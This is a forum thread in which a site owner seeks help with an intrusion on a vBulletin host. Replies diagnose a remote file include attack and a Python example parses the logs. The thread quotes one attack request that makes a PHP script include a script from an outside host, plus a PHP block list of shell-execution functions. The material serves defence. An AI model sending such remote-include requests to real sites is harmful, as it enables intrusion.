Check log: what is that hacking method?

kuwaitnt

Hello,

I have a strange hack on my box.

http://3zz.cc/iplog2.txt

That is the log from my web site.

It is on a shared server with CentOS 4.4.
I am running the latest version of vBulletin.

The server is well secured, but I don't know what this hacking method is.

Can anyone help us to prevent it?


I know the hacker is getting a help.txt file from his web site,

but I don't know where he put that file. I have checked my web site and there are no suspicious files. I checked the log, and I also don't know the name he requests to hack my web site.

I think he can delete, read and change files and folders on my web site, and I think he can also control my web site from another web site on that server.



Notice:

I am using PHP 4.4.4 with safe_mode and these disable_functions:

phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

I have set allow_url_fopen to off,

and PHP runs with phpsuexec.


I have installed mod_security with Acunetix rules and other rules I have added.

I have installed R-fx Networks LES.

My system is CentOS 4.4 with the current cPanel version.



I know the person who is trying to hack me, and I know he gets files onto my web site or another web site on my server and then tries hacking.

ramprage

Looks like a common attack on register_globals using a remote include.
Check your web.php file at the includet variable. It's probably not properly coded.

Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 

kuwaitnt

[email protected] [/tmp]# php -i | grep global
register_globals => Off => Off



It is off on that server,

but I don't understand what this is:


/home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


There is something that I think is about chown or chmod on files, or some FTP issue?


I really don't know what he is trying to do :(

The server is really well secured, but I don't understand what he is doing.
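An added example (Python, not code from the thread) that decodes the two kinds of log record quoted above: the access-log request ramprage points to, where a query-string value is itself a full URL (the remote-include signature), and the xferlog record whose fields are asked about here, which describes a completed FTP upload into public_html by the real account user. The sample lines are the two from the thread plus one constructed benign request.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache combined-format request line (the shape of the request quoted in the thread).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Meaning of the trailing fields of a wu-ftpd/pure-ftpd style xferlog record.
DIRECTION = {"i": "incoming (upload to server)", "o": "outgoing (download)", "d": "deleted"}
ACCESS_MODE = {"r": "real (logged in with the account's own credentials)", "a": "anonymous", "g": "guest"}

def find_remote_include(access_line):
    """Return (param, url) when a query-string value is an absolute URL, i.e. the
    caller is asking a script to include a file from another host; else None."""
    m = ACCESS_RE.match(access_line)
    if not m:
        return None
    query = urlparse(m.group("target")).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            if re.match(r"^(?:https?|ftp)://", v, re.I):
                return name, v
    return None

def parse_xferlog(record):
    """Decode the last ten fields of an xferlog line (the part quoted in the thread)."""
    f = record.split()
    if len(f) < 10:
        raise ValueError("too short for an xferlog record")
    filename, ttype, _flag, direction, mode, user, service, _auth, _uid, status = f[-10:]
    return {
        "filename": filename, "transfer_type": ttype, "direction": direction,
        "direction_desc": DIRECTION.get(direction, "unknown"),
        "access_mode": mode, "access_mode_desc": ACCESS_MODE.get(mode, "unknown"),
        "username": user, "service": service, "completed": status == "c",
    }

def is_web_upload(rec):
    """Completed upload by a real user into a web-served path: the account's FTP
    login was used, so this is a credential problem, not a PHP or mod_security bypass."""
    return (rec["completed"] and rec["direction"] == "i" and rec["access_mode"] == "r"
            and "/public_html/" in rec["filename"])

# Sample records: the two quoted in the thread, plus one constructed benign request.
ACCESS_LINE = ('62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] '
               '"GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0"')
BENIGN_LINE = '10.0.0.5 - - [20/Nov/2006:16:00:00 +0300] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
XFER_LINE = "/home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c"

if __name__ == "__main__":
    print(find_remote_include(ACCESS_LINE))  # ('inludet', 'http://www.arabdesing.com/help.txt?')
    print(find_remote_include(BENIGN_LINE))  # None
    rec = parse_xferlog(XFER_LINE)
    print(rec["username"], rec["direction_desc"], rec["access_mode_desc"], is_web_upload(rec))
```

The 403 on the quoted request shows that one include attempt was refused; the xferlog record is the one to act on, since it means someone logged in as nokia3 over FTP and replaced a vBulletin include file.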

kuwaitnt

Hello,

For notice: I have set register_globals off and allow_url_fopen to off.

When I was checking the domlog files I noticed

he has uploaded files via the web; in the past he uploaded an encoded file in the cgi-bin folder,

and I need to know what his method is to hack my web sites, so that I can prevent it.

I think I will make mod_security rules for that request: a _ i r nokia3 ftp 1 * c

But what about the user name, how can I make it?